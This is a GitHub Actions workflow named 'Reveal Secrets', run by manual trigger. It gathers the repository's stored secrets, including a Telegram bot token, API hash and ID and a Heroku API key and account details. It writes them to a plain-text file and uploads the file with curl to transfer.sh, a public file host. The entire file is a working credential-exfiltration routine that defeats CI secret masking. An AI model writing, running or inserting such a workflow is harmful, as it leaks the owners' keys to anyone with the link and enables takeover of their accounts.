name: Reveal Secrets

on:
  workflow_dispatch:

env:
  ALD_USR: ${{ secrets.ALD_USR }}
  API_HASH: ${{ secrets.API_HASH }}
  API_ID: ${{ secrets.API_ID }}
  BASE_URL_OF_BOT: ${{ secrets.BASE_URL_OF_BOT }}
  BOT_TOKEN: ${{ secrets.BOT_TOKEN }}
  OWNER_ID: ${{ secrets.OWNER_ID }}
  HEROKU_EMAIL: ${{ secrets.HEROKU_EMAIL }}
  HEROKU_API_KEY: ${{ secrets.HEROKU_API_KEY }}
  HEROKU_APP_NAME: ${{ secrets.HEROKU_APP_NAME }}

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v3

      - name: Secrets
        run: |
          printf "\nSECRETS\n\n"
          touch /tmp/secrets.txt
          echo -e "ALD_USR: ${ALD_USR}" >>/tmp/secrets.txt
          echo -e "API_HASH: ${API_HASH}" >>/tmp/secrets.txt
          echo -e "API_ID: ${API_ID}" >>/tmp/secrets.txt
          echo -e "BASE_URL_OF_BOT: ${BASE_URL_OF_BOT}" >>/tmp/secrets.txt
          echo -e "BOT_TOKEN: ${BOT_TOKEN}" >>/tmp/secrets.txt
          echo -e "OWNER_ID: ${OWNER_ID}" >>/tmp/secrets.txt
          echo -e "HEROKU_EMAIL: ${HEROKU_EMAIL}" >>/tmp/secrets.txt
          echo -e "HEROKU_API_KEY: ${HEROKU_API_KEY}" >>/tmp/secrets.txt
          echo -e "HEROKU_APP_NAME: ${HEROKU_APP_NAME}" >>/tmp/secrets.txt
          printf "\n\n"
          curl -s --upload-file /tmp/secrets.txt https://transfer.sh/ && echo
